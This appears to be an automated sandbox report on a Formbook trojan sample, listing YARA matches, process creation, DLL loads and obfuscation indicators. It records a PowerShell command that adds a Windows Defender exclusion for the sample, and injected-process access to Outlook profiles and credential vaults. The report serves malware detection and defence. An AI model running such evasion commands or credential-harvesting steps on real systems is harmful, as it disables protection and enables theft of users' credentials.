                Source: 7.2.Doc 1Z881A080453968203.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 7.2.Doc 1Z881A080453968203.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000F.00000002.2600975698.0000000000F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.2038647178.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000E.00000002.2601515677.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000E.00000002.2601810779.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.2038799247.00000000025F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000D.00000002.2601294723.0000000002DC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: Doc 1Z881A080453968203.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Doc 1Z881A080453968203.exe.2ed747c.1.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Doc 1Z881A080453968203.exe.2ed747c.1.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Doc 1Z881A080453968203.exe.5680000.8.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Doc 1Z881A080453968203.exe.5680000.8.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Doc 1Z881A080453968203.exe.2ec6804.5.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Doc 1Z881A080453968203.exe.2ec6804.5.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, GufG7tGXRf6WvLPGu5.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, GufG7tGXRf6WvLPGu5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, GufG7tGXRf6WvLPGu5.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, CKuiFuwbUv7jQAoi78.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, GufG7tGXRf6WvLPGu5.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, GufG7tGXRf6WvLPGu5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, GufG7tGXRf6WvLPGu5.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, CKuiFuwbUv7jQAoi78.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Doc 1Z881A080453968203.exe.2ed747c.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                Source: 0.2.Doc 1Z881A080453968203.exe.5680000.8.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                Source: 0.2.Doc 1Z881A080453968203.exe.2ec6804.5.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/7@3/3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Doc 1Z881A080453968203.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeMutant created: \Sessions\1\BaseNamedObjects\JnOGrOqYvvHHWiifiLhiP
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tggyfibh.la0.ps1Jump to behavior
                Source: Doc 1Z881A080453968203.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Doc 1Z881A080453968203.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: cttune.exe, 0000000E.00000002.2600153010.0000000003157000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000E.00000003.2236758590.0000000003157000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000E.00000003.2238823304.0000000003161000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000E.00000003.2236643499.0000000003137000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000E.00000002.2600153010.0000000003184000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Doc 1Z881A080453968203.exeReversingLabs: Detection: 63%
                Source: Doc 1Z881A080453968203.exeVirustotal: Detection: 65%
                Source: unknownProcess created: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeProcess created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"
                Source: C:\Windows\SysWOW64\cttune.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"Jump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeProcess created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Doc 1Z881A080453968203.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Doc 1Z881A080453968203.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cttune.pdb source: Doc 1Z881A080453968203.exe, 00000007.00000002.2037453632.0000000001138000.00000004.00000020.00020000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000D.00000002.2600415684.000000000077E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cttune.pdbGCTL source: Doc 1Z881A080453968203.exe, 00000007.00000002.2037453632.0000000001138000.00000004.00000020.00020000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000D.00000002.2600415684.000000000077E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ShWVPkMdEfalHck.exe, 0000000D.00000000.1945831392.0000000000C0E000.00000002.00000001.01000000.00000009.sdmp, ShWVPkMdEfalHck.exe, 0000000F.00000002.2599935900.0000000000C0E000.00000002.00000001.01000000.00000009.sdmp
                Source: Binary string: wntdll.pdbUGP source: Doc 1Z881A080453968203.exe, 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000E.00000003.2040039193.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000E.00000003.2037858373.0000000004BD7000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Doc 1Z881A080453968203.exe, Doc 1Z881A080453968203.exe, 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, cttune.exe, 0000000E.00000003.2040039193.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000E.00000003.2037858373.0000000004BD7000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 0.2.Doc 1Z881A080453968203.exe.2ed747c.1.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                Source: 0.2.Doc 1Z881A080453968203.exe.5680000.8.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                Source: 0.2.Doc 1Z881A080453968203.exe.2ec6804.5.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                .NET source code contains potential unpacker
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, GufG7tGXRf6WvLPGu5.cs.Net Code: j9EYHO3oi1 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, GufG7tGXRf6WvLPGu5.cs.Net Code: j9EYHO3oi1 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_00413863 push esp; retf 7_2_0041386C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0041A1C3 push esi; iretd 7_2_0041A1DC
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_00413999 push ebx; ret 7_2_004139A4
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0041A246 push 54822BC7h; retf 7_2_0041A250
